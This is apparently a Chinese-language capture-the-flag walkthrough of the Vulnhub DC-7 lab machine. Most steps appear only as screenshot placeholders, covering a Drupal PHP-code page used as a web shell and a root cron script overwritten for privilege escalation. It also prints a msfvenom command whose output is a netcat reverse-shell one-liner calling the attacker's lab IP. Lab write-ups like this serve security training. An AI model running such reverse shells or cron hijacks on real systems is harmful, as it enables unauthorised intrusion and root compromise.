Dc:7 Vulnhub Walkthrough

靶机下载地址:

https://www.vulnhub.com/entry/dc-7,356/

主机扫描:

Dc:7 Vulnhub Walkthrough_第1张图片

 

http://10.10.202.161/

Dc:7 Vulnhub Walkthrough_第2张图片

 

Google搜索下:

Dc:7 Vulnhub Walkthrough_第3张图片

 

Dc:7 Vulnhub Walkthrough_第4张图片

 

SSH 登录

Dc:7 Vulnhub Walkthrough_第5张图片

 

Dc:7 Vulnhub Walkthrough_第6张图片

Dc:7 Vulnhub Walkthrough_第7张图片

以上分析得出:此脚本是root每三分钟执行一次,并且www-data用户具有写入权限,因此需要想办法获取此权限,进行写入shell反弹即可

Dc:7 Vulnhub Walkthrough_第8张图片

 

https://www.digitalocean.com/community/tutorials/a-beginner-s-guide-to-drush-the-drupal-shel

Dc:7 Vulnhub Walkthrough_第9张图片 Dc:7 Vulnhub Walkthrough_第10张图片

 

Dc:7 Vulnhub Walkthrough_第11张图片

 

我们点击扩展安装一个PHP的模块

https://www.drupal.org/project/php

Dc:7 Vulnhub Walkthrough_第12张图片

 

Dc:7 Vulnhub Walkthrough_第13张图片

 

 Dc:7 Vulnhub Walkthrough_第14张图片

 

创建基本网页,选择PHP code

Dc:7 Vulnhub Walkthrough_第15张图片

 

Dc:7 Vulnhub Walkthrough_第16张图片

 

写入shell

Dc:7 Vulnhub Walkthrough_第17张图片

 

本地监听获取shell root权限

等了三分钟没shell过来,竟然没执行,这。。。。 换个方式吧

╰─ msfvenom -p cmd/unix/reverse_netcat lhost=10.10.202.159 lport=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/iwxe; nc 10.10.202.159 6666 0/tmp/iwxe 2>&1; rm /tmp/iwxe

 

Dc:7 Vulnhub Walkthrough_第18张图片

 

确认已经写入

Dc:7 Vulnhub Walkthrough_第19张图片

 

OVER !

你可能感兴趣的:(Dc:7 Vulnhub Walkthrough)